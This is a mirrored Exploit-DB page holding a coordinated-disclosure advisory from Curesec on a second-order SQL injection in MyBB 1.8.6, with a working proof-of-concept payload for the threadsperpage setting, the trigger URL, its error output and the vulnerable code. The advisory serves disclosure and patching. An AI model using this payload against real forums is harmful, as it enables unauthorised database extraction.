bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40396.txt
Offensive Security 235761b103 DB: 2016-09-20 
12 new exploits

OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs
OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs

ZineBasic 1.1 - Arbitrary File Disclosure

SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation

VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions

VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow

MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities

MyBB 1.8.6 - SQL Injection

Kajona 4.7 - Cross-Site Scripting / Directory Traversal

Docker Daemon - Privilege Escalation (Metasploit)

SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation

EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow

WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure

PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow
2016-09-20 05:07:15 +00:00

93 lines
No EOL
2.9 KiB
Text
Executable file
Raw Blame History

Security Advisory - Curesec Research Team
1. Introduction
Affected Product: MyBB 1.8.6
Fixed in: 1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.
3. Details
Description
CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P
The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.
The injection takes place into a LIMIT clause, and the query also uses ORDER
BY, making an injection of UNION ALL not possible, but it is still possibly to
extract information.
Proof of Concept
Go to the settings page:
http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7
For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3
The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Code
forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
FROM ".TABLE_PREFIX."threads t
LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
LIMIT $start, $perpage
");
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Reference in a new issue View git blame Copy permalink